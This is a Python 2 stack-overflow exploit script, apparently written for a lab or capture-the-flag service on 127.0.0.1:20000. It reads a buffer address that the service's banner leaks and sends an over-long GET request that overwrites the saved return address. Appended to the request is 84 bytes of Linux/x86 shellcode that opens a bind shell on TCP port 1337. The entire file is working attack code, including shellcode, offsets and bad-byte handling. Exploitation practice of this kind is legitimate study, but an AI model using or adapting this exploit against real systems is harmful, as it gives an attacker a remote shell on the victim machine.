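from TCPClient import TCPClient
import os
import struct
import sys

# Stack-overflow exploit for a local service on 127.0.0.1:20000.
#
# The service's first line (the "banner") leaks a buffer address at a fixed
# offset (hdr[21:31], a "0x........" string).  An over-long GET path overwrites
# the saved EBP/EIP behind that buffer; the return address is pointed back at
# the shellcode that is appended directly after the request line.  Offsets
# are target-specific.  Python 2 code: struct.pack() returns str here.

# Linux/x86 bind shell, 84 bytes: socket/bind/listen/accept on TCP port
# 0x0539 (1337), dup2() the accepted socket onto fds 2..0, execve("/bin//sh").
# Contains no NUL, CR, LF or space bytes, so it survives request-line parsing.
SHELLCODE = (
    "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96"
    "\x43\x52\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56"
    "\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1"
    "\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0"
    "\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53"
    "\x89\xe1\xcd\x80"
)

# Overflow layout inside the path: "/" + 135 filler bytes reach the saved
# frame pointer, then 4 bytes land in EBP, 4 in EIP (return address) and
# 4 sit at ESP right after the ret.
FILLER_LEN = 135
SAVED_EBP = "AAAA"
SAVED_ESP = "CCCC"

# Bytes that must not occur inside the packed return address: it lives in
# the HTTP request line, where NUL/CR/LF terminate and space splits tokens.
BAD_BYTES = "\x00\x0a\x0d\x20"


def build_request(buf_addr):
    """Build the overflowing request line for a leaked buffer address.

    Returns ``(request_line, shellcode_addr)``.  ``shellcode_addr`` is the
    address written into EIP: the leaked buffer address plus the length of
    the request line, i.e. where the shellcode starts once it is appended.

    Raises ValueError if ``buf_addr`` is not a plausible 32-bit address.
    """
    if not 0 < buf_addr < 2 ** 32:
        raise ValueError("leaked buffer address out of range: %r" % (buf_addr,))

    def request(eip):
        return "GET /%s%s%s%s HTTP/1.1" % (FILLER_LEN * "A", SAVED_EBP, eip, SAVED_ESP)

    # EIP is always exactly 4 bytes, so the request-line length (and hence
    # the shellcode offset) is known before the real address is packed.
    shellcode_addr = buf_addr + len(request("BBBB"))
    eip = struct.pack("<L", shellcode_addr)  # little-endian, 32-bit
    clashing = [c for c in eip if c in BAD_BYTES]
    if clashing:
        # Not fatal (the target's parser is not known here), but this is the
        # usual reason the jump lands short: the line gets cut at that byte.
        sys.stderr.write(
            "warning: return address 0x%08x contains request-line bad bytes %r\n"
            % (shellcode_addr, clashing)
        )
    return request(eip), shellcode_addr


con = TCPClient('127.0.0.1', 20000)
hdr = con.recvline()
print("rcv>> %s" % hdr)
# Fail with a clear message instead of a ValueError from int() when the
# banner does not carry the leak where this script expects it.
if len(hdr) < 31:
    sys.exit("banner is only %d bytes; cannot read leaked address at [21:31]" % len(hdr))
bufAddr = int(hdr[21:31], 16)

req, shellcodePtr = build_request(bufAddr)
# No CRLF after the request line: the shellcode is meant to sit directly
# behind it in the target's buffer (presumably it reads the raw request).
total = req + SHELLCODE
con.send(total)
print("sent %d bytes; EIP -> 0x%08x; bind shell should now listen on tcp/1337"
      % (len(total), shellcodePtr))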